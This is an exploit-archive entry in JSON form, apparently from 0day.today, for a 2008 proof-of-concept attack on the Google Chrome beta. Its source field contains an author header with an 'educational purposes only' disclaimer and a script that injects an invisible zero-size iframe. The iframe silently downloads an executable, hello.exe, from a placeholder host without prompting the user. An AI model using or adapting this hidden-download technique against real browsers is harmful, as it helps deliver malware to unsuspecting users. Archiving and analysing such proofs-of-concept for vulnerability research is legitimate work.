Google Chrome Browser 0.2.149.27 Automatic File Download Exploit

{"type": "zdt", "lastseen": "2016-04-20T00:59:44", "bulletinFamily": "exploit", "cvelist": [], "history": [], "title": "Google Chrome Browser 0.2.149.27 Automatic File Download Exploit", "published": "2008-09-03T00:00:00", "href": "http://0day.today/exploit/description/9253", "cvss": {"vector": "NONE", "score": 0}, "description": "Exploit for unknown platform in category remote exploits", "hash": "351c20a31a3179ed25859ad5e7875a10055dbc5483d95be07e6bcdbed99ff7a8", "references": [], "objectVersion": "1.0", "edition": 1, "sourceData": "================================================================\r\nGoogle Chrome Browser 0.2.149.27 Automatic File Download Exploit\r\n================================================================\r\n\r\n\r\n\r\n***************************************************************************\r\n Author: nerex\r\n E-mail: nerex[at]live[dot]com\r\n\r\n Google's new Web browser (Chrome) allows files (e.g., executables) to be automatically\r\n downloaded to the user's computer without any user prompt.\r\n\r\n This proof-of-concept was created for educational purposes only.\r\n Use the code it at your own risk.\r\n The author will not be responsible for any damages.\r\n\r\n Tested on Windows Vista SP1 and Windows XP SP3 with Google Chrome (BETA)\r\n**************************************************************************\r\n<script>\r\ndocument.write('<iframe src=\"http://www.example.com/hello.exe\" frameborder=\"0\" width=\"0\" height=\"0\">');\r\n</script>\r\n\r\n\r\n\n# 0day.today [2016-04-20] #", "id": "1337DAY-ID-9253", "sourceHref": "http://0day.today/exploit/9253", "modified": "2008-09-03T00:00:00", "reporter": "nerex", "enchantments": {"vulnersScore": 6.4}}